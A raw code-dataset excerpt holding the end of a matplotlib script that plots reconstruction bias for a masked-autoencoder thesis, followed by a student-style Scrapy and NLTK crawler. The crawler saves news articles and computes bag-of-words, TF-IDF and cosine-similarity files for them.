[10,20,30,40,50]\n \n fig, ax = plt.subplots()\n plt_labels = []\n \n for i in range(4):\n p = biases[i*5:i*5+5]\n y = p['mean'].to_numpy()\n plt_labels.append('t={}%'.format(models[i]))\n ax.scatter(x, y, color=colors[i], zorder=i+2, s=15)\n\n plt_labels.append('0 bias')\n x = np.linspace(0, 55, 50)\n y = np.zeros(50)\n \n ax.plot(x,y,c='r',linestyle='dashed',linewidth=0.8,zorder=1)\n \n ax.set_axisbelow(True)\n ax.grid(color='gray', linestyle='dashed', linewidth = 0.5)\n plt.legend(labels=plt_labels, title='Masking Ratio',\n title_fontsize='small', fontsize='small', fancybox=True)\n #plt.title('Calculated Biases')\n plt.xlabel(\"Masking Ratio (p)\")\n plt.ylabel(\"Bias (K)\")\n plt.xlim([5, 55])\n \n # save\n plt.savefig(outfile, dpi=300)\n plt.close()\n plt.close()\n print(f'Wrote: {outfile}')\n return\n\ndef figs_bias_hist(orig_file='data/MAE_LLC_valid_nonoise_preproc.h5',\n recon_file = 'data/mae_reconstruct_t75_p10.h5',\n mask_file = 'data/mae_mask_t75_p10.h5'):\n # Load up images\n f_orig = h5py.File(orig_file, 'r')\n f_recon = h5py.File(recon_file, 'r')\n f_mask = h5py.File(mask_file, 'r')\n\n median_offsets = []\n mean_offsets = []\n for idx in range(10000):\n orig_img = f_orig['valid'][idx,0,...]\n recon_img = f_recon['valid'][idx,0,...]\n mask_img = f_mask['valid'][idx,0,...]\n\n diff_true = recon_img - orig_img \n\n median_offset = np.median(diff_true[np.abs(diff_true) > 0.])\n mean_offset = np.mean(diff_true[np.abs(diff_true) > 0.])\n #mean_img = np.mean(orig_img[np.isclose(mask_img,0.)])\n # Save\n median_offsets.append(median_offset)\n mean_offsets.append(mean_offset)\n \n df = pandas.DataFrame({'median_offset': median_offsets,\n 'mean_offset': mean_offsets})\n \n ax = sns.histplot(df, x='mean_offset')\n plt.vlines(x=0.0267, ymin=0, ymax=600, colors='red', ls='--', label='bias (0.0267)')\n plt.legend(loc='upper left')\n ax.set_xlim(-0.1, 0.1)\n \n plt.savefig('bias_histogram.png', dpi=300)\n plt.close()\n\n# Command line execution\nif __name__ == '__main__':\n\n #figs_training()\n fig_cloud_coverage()\n #figs_imgs()","sub_path":"papers/MAE/Figures/py/mae_figs_thesis.py","file_name":"mae_figs_thesis.py","file_ext":"py","file_size_in_byte":20720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214893592","text":"import re\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport sklearn\nimport nltk\nfrom string import punctuation\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import PorterStemmer\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport urllib\nimport urllib3\n\nfrom urllib.parse import urlparse\nimport scrapy\n\nfrom ftfy import fix_encoding\n\nimport urllib.request\n\nimport json\nimport unicodedata\nfrom unidecode import unidecode \n#scrapy startproject f319 \n#scrapy crawl threads\n\n\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.selector import Selector\n\nfrom urllib import parse as UrlParser\nfrom pyquery import PyQuery\n\n\n\nimport validators\nfrom newspaper import Article\n\n\n\nfrom requests_html import HTMLSession\nfrom urllib.parse import urlparse, urljoin\nimport colorama\n\ncolorama.init()\n\nGREEN = colorama.Fore.GREEN\nGRAY = colorama.Fore.LIGHTBLACK_EX\nRESET = colorama.Fore.RESET\nYELLOW = colorama.Fore.YELLOW\nBLUE = colorama.Fore.BLUE\n\n# initialize the set of links (unique links)\ninternal_urls = set()\nexternal_urls = set()\n\n\nfrom urllib.parse import unquote\nfrom pathlib import PurePosixPath\nimport random2\n\ntotal_urls_visited = 0\n\n\n\n\n\nclass ThreadsSpider(scrapy.Spider):\n\tname = \"vy\"\n #folder_path = \"lo-gi\"\n\tprint(\"================================SCRAPY-WEBSITE================================\")\n\turl = input(\"Input website's url: \")\n\tresponse = requests.get(url)\n\tsoup = BeautifulSoup(response.text, 'html.parser')\n\tparsedUrl = UrlParser.urlparse(url)\n\n\tmy_stopwords = set(stopwords.words('english') + list(punctuation))\n\n\tsupportCategories = [\n\t'national', \n\t'world', \n\t'lifestyle',\n\t'travel', \n\t'entertainment',\n\t'technology', \n\t'finance',\n\t'sport',\n\t'news',\n\t'sports',\n\t'entertainments'\n\t]\n\n\tsupportCategories = [re.sub(r\"\\s|-\", '', category) for category in supportCategories]\n\n\tdef parse(self, response):\n\t\t\n\n\t\t\n\t\t#sef = crawl(response.url)\n\n\t\tarticle = Article(response.url)\n\t\tarticle.download()\n\t\tarticle.parse()\n\n\t\tsef = {'title':article.title}\n\n\n\t\tfol =response.meta.get('folder_pat')\n\n\t\tfilename = '%s.txt' % (sef['title'] + str(random2.randint(1,1000)))\n\n\n\t\twith open(fol+\"/\"+filename, 'wb') as f:\n\t\t\tf.write(response.body)\n\t\tself.log('Saved file3 %s' % filename)\n\n\n\n\tdef start_requests(self):\n \t\t#Kiem tra URL hop le\n\t\tdef __is_url__(self):\n\t\t\treturn validators.url(url)\n\n\t\tdef crawl(url):\n\t\t\t\n\t\t\tarticle = Article(url)\n\t\t\tarticle.download()\n\t\t\tarticle.parser()\n\n\t\t\tresult = {'title':article.title}\n\n\t\t\treturn result\n\n\n\n\n\t\tdef writeText(path, content):\n\t\t\tfile = open(path, \"w\", encoding=\"utf-8\")\n\t\t\tif isinstance(content, str):\n\t\t\t\tfile.write(content)\n\t\t\telif (isinstance(content, collections.abc.Iterable)):\n\t\t\t\tfor item in content:\n\t\t\t\t\tfile.write(item + '\\n')\n\n\t\t\tfile.close()\n\t\t\n\n\n\t\tdef __get_all_link_backup(url):\n\t\t\tresponse = requests.get(url)\n\t\t\tsoup = BeautifulSoup(response.text, 'html.parser')\n\t\t\tall_link = []\n\t\t\tinformation = soup.find_all('a')\n\n\t\t\tfor data in information:\n\t\t\t\tall_link.append(data['href'])\n\n\t\t\treturn all_link\n\n\n\n\t\tdef __get_categories__(url,response, supportCategories):\n\t\t\tif (response.status_code != 200):\n\t\t\t\treturn None, 'status code is not 200'\n\n\t\t\tparsedUrl = UrlParser.urlparse(url)\n\n\t\t\tdoc = PyQuery(response.text)\n\t\t\tall_links = doc('a[href]')\n\n\t\t\tprocessedlink = {}\n\t\t\tcategories = []\n\t\t\tfor link in all_links:\n\t\t\t\tlink = doc(link)\n\t\t\t\thref = link.attr('href')\n\t\t\t\tparsedhref = UrlParser.urlparse(href)\n\t\t\t\tif not bool(parsedhref.hostname):\n\t\t\t\t\thref = \"{}://{}{}\".format(parsedUrl.scheme, parsedUrl.hostname, href)\n\n\t\t\t\tif href in processedlink:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprocessedlink[href] = True\n\n\t\t\t\ttitle = link.text().strip()\n\t\t\t\ttitle_ = title.lower()\n\t\t\t\ttitle_ = re.sub(r\"\\s|-\", '', title_)\n\n\t\t\t\tif title_ in supportCategories:\n\t\t\t\t\tcategories.append((href, title))\n\n\t\t\treturn categories, None\t\t\t\t\n\n\t\tdef __get_text__(file):\n\t\t\tread_file = open(file, \"r\", encoding=\"utf-8\")\n\t\t\ttext = read_file.readlines()\n\t\t\ttext = ' '.join(text)\n\t\t\treturn text\n\n\t\tdef __clean_html__(text):\n\t\t\tsoup = BeautifulSoup(text, \"html.parser\")\n\t\t\treturn soup.get_text()\n\n\t\tdef __remove_special_character(text):\n\t\t\tstring = re.sub('[^\\w\\s]', '', text)\n\t\t\tstring = re.sub('\\s+', ' ', string)\n\t\t\tstring = string.strip()\n\t\t\treturn string\n\n\t\tdef __filter_texts__(txtArr):\n\t\t\tres = []\n\t\t\tfor i in range(len(txtArr)):\n\t\t\t\ttext_cleaned = __clean_html__(txtArr[i])\n\t\t\t\tsents = sent_tokenize(text_cleaned)\n\t\t\t\tsents_cleaned = [__remove_special_character(s) for s in sents]\n\t\t\t\ttext_sents_join = ' '.join(sents_cleaned)\n\t\t\t\twords = word_tokenize(text_sents_join)\n\t\t\t\twords = [word.lower() for word in words]\n\t\t\t\twords = [ps.stem(word) for word in words]\n\n\t\t\t\tsample = ''\n\t\t\t\tfor i in words:\n\t\t\t\t\tsample += i \n\t\t\t\t\tsample += \" \"\n\n\t\t\t\tres.append(sample)\n\n\t\t\treturn res\n\n\t\tdef writeText(path, content):\n\t\t\tfile = open(path, \"w\", encoding=\"utf-8\")\n\t\t\tif isinstance(content, str):\n\t\t\t\tfile.write(content)\n\t\t\telif (isinstance(content, collections.abc.Iterable)):\n\t\t\t\tfor item in content:\n\t\t\t\t\tfile.write(item + '\\n')\n\n\t\t\tfile.close()\n\n\t\tdef writeCountVectorizer(bow, bow1 ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\tf.write('\\n')\n\t\t\tf.write(str(bow1))\n\t\t\tf.close\n\n\t\tdef outout(bow ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\t\n\t\t\tf.close\n\n\n\t\tdef writeTfidfVectorizer(bow, bow1, bow3 ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\tf.write('\\n')\n\t\t\tf.write(str(bow1))\n\t\t\tf.write(str(bow1))\n\n\t\t\tf.close\n\n\t\tdef CosiSim(x):\n\t\t\tcosinearry = []\n\t\t\tmyarray = []\n\t\t\tj = z = 0\n\t\t\tv = 1.00\n\t\t\twhile z < len(x):\n\t\t\t\twhile j < len(x):\n\t\t\t\t\tv = float(cosine_similarity(x[z],x[j]))\n\t\t\t\t\tmyarray.append(round(v,2))\n\t\t\t\t\tj += 1\n\t\t\t\tcosinearry.append(myarray)\n\t\t\t\tz += 1\n\t\t\treturn cosinearry\n\n\n\n\n\n\t\t\tdef __topics__(array_topics):\n\t\t\t\tfor i in range(len(array_topics)):\n\t\t\t\t\tprint(str(i + 1) + '. ' + str(array_topics))\n\n\n\t\t\tdef __choose_topics__(array_topics):\n\t\t\t\tfor i in range(len(array_topics)):\n\t\t\t\t\tprint(str(i + 1) + '. ' + str(array_topics))\n\n\t\t\t\t\n\t\t\n\n\n\t\tdef __BoW__(array):\n\t\t\tresult = CountVectorizer()\n\t\t\tbow = result.fit_transform(array).todense()\n\t\t\tbow1 = result.vocabulary_\n\n\t\t\tarray_BoW = []\n\t\t\tarray_BoW.append((bow, bow1))\n\n\t\t\treturn array_BoW\n\n\n\t\tdef __TF_IDF__(array):\n\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\ttf_idf_matrix = tf.fit_transform(corpus_final)\n\t\t\tfeature_names = tf.get_feature_names()\n\t\t\tdense = tf_idf_matrix.todense()\n\n\t\t\tarray_TF_IDF = []\n\t\t\tarray_TF_IDF.append((tf_idf_matrix, feature_names, dense))\n\n\t\t\treturn array_TF_IDF\n\n\n\t\tdef __show_topics__(categories):\n\t\t\tprint(\"========================CATEGORY=========================\")\n\n\t\t\tfor i in range(len(categories)):\n\t\t\t\tprint(' ' + str(i + 1) + '. ' + str(categories[i][1]))\n\t\t\tprint(\"=========================================================\")\n\n\n\t\tdef __hylt__(array_list, categories):\n\t\t\tarray_result = []\n\n\t\t\tfor data in array_list:\n\t\t\t\t#print(str(data[1]))\n\t\t\t\tif (categories[-1] == \"/\"):\n\n\t\t\t\t\turl = categories \n\t\t\t\telse:\n\t\t\t\t\turl = categories + \"/\"\n\n\t\t\t\tfor x in range(len(data)):\n\t\t\t\t\tif (x != 0):\n\t\t\t\t\t\ttemp = []\n\t\t\t\t\t\tfor y in data[x]:\n\t\t\t\t\t\t\ttemp.append(y)\n\t\t\t\t\t\t#print(str(temp[0]))\n\t\t\t\n\t\t\t\t\t\t\turl = url + str(temp[0]) + \"/\"\n\t\t\t\t\t\t#print(str(url))\n\t\t\t\t\t\tarray_result.append(str(url))\n\n\t\t\t\t#print(str(url))\n\t\t\t\t#print(\"\\n\")\n\n\n\t\t\treturn array_result\n\n\t\tdef __url_hylt__(array_list, categories):\n\t\t\tarray_result = []\n\t\t\t\n\t\t\tfor data in array_list:\n\t\t\t\tresponse1 = requests.get(data)\n\t\t\t\tsoup1 = BeautifulSoup(response1.text, 'html.parser')\n\t\t\t\t\n\t\t\t\tinfomation = soup1.find_all('uri')\n\t\t\t\tprint(str(len(infomation)))\n\n\n\t\t\t\tcheck = \"https://edition.cnn.com/entertainment/\"\n\t\t\t\tcount_ = 1\n\n\n\n\t \n\t\t\t\tfor x in infomation:\n\t\t\t\t\tarray_result.append(x)\n\t\t\t\t\tprint(str(x))\n\t\t\t\t\t\n\n\n\n\n\n\n\n\n\t\t\treturn array_result\n\n\t\tdef __show_hylt__(array):\n\t\t\tchee = []\n\t\t\tfor data in array:\n\t\t\t\tchee.append(str(data[1]))\n\n\n\t\t\tlist_set = set(chee) \n\t\t # convert the set to the list \n\t\t\tunique_list = (list(list_set)) \n\t\t\tfor data in unique_list: \n\t\t\t\tprint(f\"{YELLOW}[*] : {data}{RESET}\")\n\n\n\n\n\t\tdef unique(list1): \n\t \n\t\t # insert the list to the set \n\t\t\tlist_set = set(list1) \n\t\t # convert the set to the list \n\t\t\tunique_list = (list(list_set)) \n\t\t\tarray = []\t\n\t\t\tfor data in unique_list: \n\t\t\t\tprint(f\"{YELLOW}[*] Internal link: {data}{RESET}\")\n\t\t\t\tarray.append(data)\n\t\t\treturn array\n\n\n\n\t\tdef is_valid(url):\n\t\t \"\"\"\n\t\t Checks whether `url` is a valid URL.\n\t\t \"\"\"\n\t\t parsed = urlparse(url)\n\t\t return bool(parsed.netloc) and bool(parsed.scheme)\n\t\tdef myFunc(e):\n\t\t return len(e)\n#ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\t\tdef __show_elements_topics__(categories):\n\t\t\turl = categories\n\t\t\tprint(str(url))\n\t\t\turls = set()\n\t # domain name of the URL without the protocol\n\t#22-06\n\t\t\tdomain_name = urlparse(url).netloc\n\t\t #domain_name_backup = \"https://www.news.com.au/travel/\"\n\t\t \n\t\t #print(str(domain_name))\n\t\t #domain_name = urlparse(url).netloc\n\t\t # initialize an HTTP session\n\t\t\tsession = HTMLSession()\n\t\t # make HTTP request & retrieve response\n\t\t\tresponse = session.get(url)\n\n\n\n\t\t\tsample_de =PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t url\n\t\t ).path\n\t\t )\n\t\t ).parts[1]\n\n\t\t\t#print(str(sample_de))\n\n\n\n\n\t\t # execute Javascript\n\t\t\ttry:\n\t\t\t\tresponse.html.render()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tsoup = BeautifulSoup(response.html.html, \"html.parser\")\n\t\t\tarray_root = [] #/\n\t\t\tarray_root_1 = [] #travel\n\t\t\tarray_root_2 = [] #(travel,destinations)\n\t\t\tarray_root_3 = [] #(destinations, europe)\n\t\t\tarray_root_4 = [] #(europe, etc....)\n\n\n\t\t\tfor a_tag in soup.findAll(\"a\"):\n\t\t\t\thref = a_tag.attrs.get(\"href\")\n\t\t\t\tif href == \"\" or href is None:\n\t\t # href empty tag\n\t\t\t\t\tcontinue\n\t\t # join the URL if it's relative (not absolute link)\n\t\t\t\thref = urljoin(url, href)\n\t\t\t\tparsed_href = urlparse(href)\n\t\t # remove URL GET parameters, URL fragments, etc.\n\t\t\t\thref = parsed_href.scheme + \"://\" + parsed_href.netloc + parsed_href.path\n\n\t\t #print(str(href))\n\n\t\t \n\n\n\t\t\t\tcount_sample = PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts\n\n\t\t\t\tcount_count = len(count_sample)\n\n\t\t#get ROOT_1\n\t\t\t\ti = 0\n\t\t\t\tfor i in range(len(count_sample)):\n\t\t\t\t\tsample = PurePosixPath(\n\t\t\t\t\tunquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts[i]\n\t\t\t\t\tdomain_name_sample = urlparse(href).netloc\n\t\t\t\t\tif(i == 1):\n\t\t\t\t\t\tsample1 = PurePosixPath(\n\t\t\t\t\tunquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts[1]\n\t\t\t\t\t\tif((sample_de == sample1) &(domain_name == domain_name_sample) ):\n\t\t\t\t\t\t\tarray_root_1.append(href)\n\t\t\t\t\t\t\tbreak\n\n\n\t\t\t\t\tif((sample_de == sample) & (domain_name == domain_name_sample)):\n\t\t\t\t\t\tarray_root.append(href)\n\t\t\t\t\t\tbreak\n\n\n\n\t\t\n\t\t\tmax_count_root = 0\n\t\t\tfor data in array_root_1:\n\n\t\t\t\tcount_root = PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t data\n\t\t ).path\n\t\t )\n\t\t ).parts\n\n\t\t\t\tcount_count = len(count_root)\n\t\t\t\tif(count_count > max_count_root):\n\t\t\t\t\tmax_count_root = count_count \n\n\n\n\n\t\t\t#print(str(max_count_root))\n\t\t\tcheck = 2 \n\n\t\t\tarray_root_de = [set() for i in range(max_count_root - 3)]\n\t\t#lotsosets[0].add('see me?')\n\t\t\t\n\t\t\ttemp = []\n\t\t\t#print(array_root_de)\n\n\t\t\tfor data_root1 in array_root_1:\n\t\t\t\tcount_data_root1 = len(PurePosixPath(unquote(urlparse(data_root1).path)).parts)\n\t\t \n\t\t\t\tif( count_data_root1 >= 3 ):\n\t\t\t\t\t#print('--------------------------------------------------------------')\n\n\t\t\t\t\t#print(f\"{BLUE} {data_root1}{RESET}\")\n\t\t\t\t\t#print(f\"{GREEN}: {count_data_root1}{RESET}\")\n\t\t\t\t\tindex = [set() for i in range(count_data_root1 - 1 )]\n\t\t\t\t\t#print(index)\n\n\t\t\t\t\tfor i in range (1, count_data_root1 ):\n\t\t\t\t\t\tif(i != count_data_root1 ):\n\t\t\t\t\t\t\tsample = PurePosixPath(unquote(urlparse(data_root1).path)).parts[i]\n\t\t\t\t\t\t\tindex[i - 1].add(sample)\n\n\t\t\t\t\t\t\t#print(f\"{YELLOW}: {index[i-1]}{RESET}\")\n\n\n\t\t\t\t\t#print(index)\n\t\t #array_root_de[count_data_root1 - 3].append(index)\n\t\t #temp = []\n\t\t #temp.append(index)\n\t\t #print(temp)\n\t\t\t\t\ttemp.append(list(index))\n\n\n\n\t\t\ttemp.sort(reverse=True, key=myFunc)\n\n\t\t\t#for data in temp:\n\t\t\t\t#print(data)\n\t\t \n\n\t\t\tchee = []\n\t\t\tfor data in temp:\n\t\t\t\tchee.append(str(data[1]))\n\n\t\t\t\n\t\t\t#unique(chee)\n\t\t\treturn temp\n\n\n\n\n#ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\t\tdef ___get_topics__(categories):\n\t\t\tobj = 0\n\t\t\tcheck = 0\n\t\t\twhile( (obj <= 0) | (obj > len(categories)) ):\n\t\t\t\tobj = int(input(\"Enter number to select category)\"))\n\t\t\t\tcheck = obj\n\t\t\t\tbreak\n\t\t\t\n\t\t\tarray_category = []\n\t\t\t#categories[i][0] = href\n\t\t\t#categories[i][1] = title\n\t\t\tarray_category.append((categories[check - 1][0], categories[check - 1 ][1]))\n\n\t\t\treturn array_category\n\n\n\n\n\t\tdef __create_dirPath__(categories):\n\t\t\tfor href, title in categories:\n\t\t\t\tdirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname, title, title)\t\n\t\t\t\tdirPath_word = \"{}/{}/{}_word\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_BoW = \"{}/{}/{}_BoW\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Tf_Idf = \"{}/{}/{}_Tf_Idf\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Cosine = \"{}/{}/{}_Cosine\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Precision = \"{}/{}/{}_Precision\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Recall = \"{}/{}/{}_Recall\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_F_score = \"{}/{}/{}_Fscore\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tos.makedirs(dirPath_html, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_word, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_BoW, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Tf_Idf, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Cosine, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Precision, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Recall, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_F_score, exist_ok=True)\n\n\n\t\t\t\t#create dirPath Bow and TF-IDF inside Cosine\n\t\t\t\tdirPath_Cosine_BoW = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, title, title,\"BoW\")\n\t\t\t\tdirPath_Cosine_Tf_Idf = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, title, title, \"Tf_Idf\")\n\t\t\t\tos.makedirs(dirPath_Cosine_BoW, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Cosine_Tf_Idf, exist_ok=True)\n\n\n\n\t\tps = PorterStemmer()\n\t\t \n\t\tcorpus = [] \n\n\t\tcategories = None\n\t\tcategories, error = __get_categories__(self.url,self.response, self.supportCategories)\n\n\n\t\t__show_topics__(categories)\n\t\tarray_categories = ___get_topics__(categories)\n\n\t\tprint(str(array_categories))\n\t\t__create_dirPath__(array_categories)\n\n\n\t\tarray_Travel = [\n\t\t'https://edition.cnn.com/entertainment/culture/',\n\t\t'https://edition.cnn.com/entertainment/movies/',\n\t\t'https://edition.cnn.com/entertainment/celebrities/',\n\t\t'https://edition.cnn.com/entertainment/tv-shows/']\n\n\t\ttemp = []\n\t\ttemp_de = []\n\t\tfor href, title in array_categories:\n\t\t\ttemp.append(title)\n\t\t\ttemp_de.append(href)\n\n\t\tprint(str(temp[0]))\n\t\tprint(str(temp_de[0]))\n\n\n\t\tresult = []\n\t\tresult = __show_elements_topics__(str(temp_de[0]))\n\t\t#__show_hylt__(result)\n\n\n\t\tresult_de = []\n\t\tresult_de = __hylt__(result, str(temp_de[0]))\n\t\trere = []\n\t\trere = unique(result_de)\n\t\t#for data in result_de:\n\t\t\t#print(str(data))\n\n\t\tresult_de_de = []\n\t\tresult_de_de = __url_hylt__(array_Travel, str(urlparse(temp_de[0]).netloc))\n\t\t#result_de_de = __url_hylt__(array_Travel, str(temp_de[0]))\n\n\n\t\t\n\n\n\t\tdirPath_html_Travel = \"{}/{}/{}_html\".format(self.parsedUrl.hostname,temp[0], temp[0])\n\n\n\n\n\n\n\n\n\t\tfor i in range(len(result_de_de)):\n\n\t\t\tyield scrapy.Request(url=result_de_de[i],meta={'folder_pat':dirPath_html_Travel}, callback=self.parse)\n\n\n\n\n\n\n#=============================Make Directoy==================================================#\n\t\t\n\n\n\n\t\tarray_name_file = []\n\t\tarray_file = []\n\t\tdirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname,str(temp[0]), str(temp[0]))\t\n\t\tfor root, dirs, files in os.walk(dirPath_html):\n\t\t\tfor file in files:\n\t\t\t\tif file.endswith(\".txt\"):\n\t\t\t\t\t#print(os.path.join(file).split(\".txt\"))\n\t\t\t\t\t#print(os.path.join(root, file)\n\t\t\t\t\tarray_sample = []\n\t\t\t\t\tarray_sample = os.path.join(file).split(\".txt\")\n\t\t\t\t\t\t\n\t\t\t\t\tarray_file.append(os.path.join(file))\n\n\t\t\t\t\tarray_name_file.append(array_sample[0])\n\n\n\t\tfor data in array_name_file:\n\t\t\tprint(str(data))\n\n\n\n\t\t#dirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname, title, title)\t\n\t\tdirPath_word = \"{}/{}/{}_word\".format(self.parsedUrl.hostname,str(temp[0]), str(temp[0]))\n\t\tdirPath_BoW = \"{}/{}/{}_BoW\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\t\tdirPath_Tf_Idf = \"{}/{}/{}_Tf_Idf\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\t\tdirPath_Cosine = \"{}/{}/{}_Cosine\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\n\n\t\tdirPath_Cosine_BoW = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]),\"BoW\")\n\t\tdirPath_Cosine_Tf_Idf = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]),\"Tf_Idf\")\n\n\t\tluachon = 1\n\n\t\tif(luachon == 1):\n\t\t\tfor data in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_html, data))\n\t\t\t\ttext_cleaned = __clean_html__(text)\n\n\t\t\t\t#print(str(text_cleaned))\n\t\t\t\tsents = sent_tokenize(text_cleaned)\n\n\t\t\t\t#print(str(sents))\n\n\t\t\t\tsents_cleaned = [__remove_special_character(s) for s in sents]\n\t\t\t\ttext_sents_join = ' '.join(sents_cleaned)\n\t\t\t\twords = word_tokenize(text_sents_join)\n\t\t\t\twords = [word.lower() for word in words]\n\t\t\t\twords = [word for word in words if word not in self.my_stopwords]\n\t\t\t\tps = PorterStemmer()\n\t\t\t\twords = [ps.stem(word) for word in words]\n\t\t\t\tstringwords = ' '.join(words)\n\n\t\t\t\tsample = ''\n\t\t\t\tfor i in words:\n\t\t\t\t\tsample += i \n\t\t\t\t\tsample += \" \"\n\t\t\t\t#print(str(stringwords))\n\t\t\t\twriteText(\"{}/{}\".format(dirPath_word, data), stringwords)\n\n\n\n\t\t\n\t\t\tfor data1 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data1))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\n\t\t\t\tresult = CountVectorizer()\n\t\t\t\tbow = result.fit_transform(corpus_final).todense()\n\n\t\t\t\tbow1 = result.vocabulary_\n\n\t\t\t\twriteCountVectorizer(bow, bow1, data1, dirPath_BoW)\n\n\n\t\t\n\t\t\tfor data2 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data2))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\t\n\n\t\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\t\ttf_idf_matrix = tf.fit_transform(corpus_final)\n\t\t\t\tfeature_names = tf.get_feature_names()\n\t\t\t\tdense = tf_idf_matrix.todense()\n\n\t\t\t\twriteTfidfVectorizer(tf_idf_matrix, feature_names, dense, data2, dirPath_Tf_Idf )\n\n\n\n\t\t\n\t\t\tfor data3 in array_file:\n\t\t\t\t\n\t\t\t\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data3))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\n\n\t\t\t\tresult = CountVectorizer()\n\t\t\t\tbow = result.fit_transform(corpus_final).todense()\n\n\t\t\t\tbow1 = result.vocabulary_\n\n\n\t\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\t\ttf_idf_matrix = tf.fit_transform(corpus_final)\n\t\t\t\tfeature_names = tf.get_feature_names()\n\t\t\t\tdense = tf_idf_matrix.todense()\n\n\n\t\t\t\tcorpus_final_BoW = []\n\t\t\t\tcorpus_final_Tf = []\n\t\t\t\tcorpus_final_BoW = CosiSim(bow)\n\t\t\t\tcorpus_final_Tf = CosiSim(dense)\n\n\t\t\t\toutout(corpus_final_BoW, data3, dirPath_Cosine_BoW)\n\t\t\t\toutout(corpus_final_Tf, data3, dirPath_Cosine_Tf_Idf)\n\t\t\t\t\n\n\n\n\t\telif(luachon == 2):\n\t\t\tfor data4 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data4))\n\t\t\t\tcorpus_final = []\n\t\t\t\tcorpus_final.append(text)\n\n\t\t\t\tiris = datasets.load_iris()\n\t\t\t\tx = iris.data\n\t\t\t\ty = iris.target\n\t\t\t\tclass_names = iris.target_names\n\n\t\t\t\tx_train, x_test, y_train, y_test = train_test_split(x, y, random_state = 0, test_size = 0.3)\n\t\t\t\tknn = KNeighborsClassifier(n_neighbors = 10)\n\t\t\t\tknn.fit(x_train, y_train)\n\n\t\t\t\taccuracy = knn.score(x_test, y_test)\n\t\t\t\ty_pred = knn.predict(x_test)\n\t\t\t\tcm = confusion_matrix(y_test, y_pred)\n\t\t\t\tprecision_score(y_test, y_pred, average=None)\n\t\t\t\trecall_score(y_test, y_pred, average=None)\n\t\t\t\tf1_score(y_test, y_pred, average=None)\n\t\t\t\tclassifier = svm.SVC(kernel='linear', c=0.01).fit(x_train, y_train)\n\n\t\t\t\tnp.set_printoptions(precison=2)\n\t\t\t\ttitles_options = 